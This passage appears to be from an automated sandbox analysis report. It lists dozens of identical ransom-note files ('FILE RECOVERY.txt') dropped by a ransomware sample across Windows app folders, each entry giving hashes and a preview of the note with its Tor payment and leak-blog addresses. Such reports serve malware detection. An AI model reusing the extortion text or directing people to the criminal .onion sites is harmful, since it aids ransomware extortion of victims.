                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
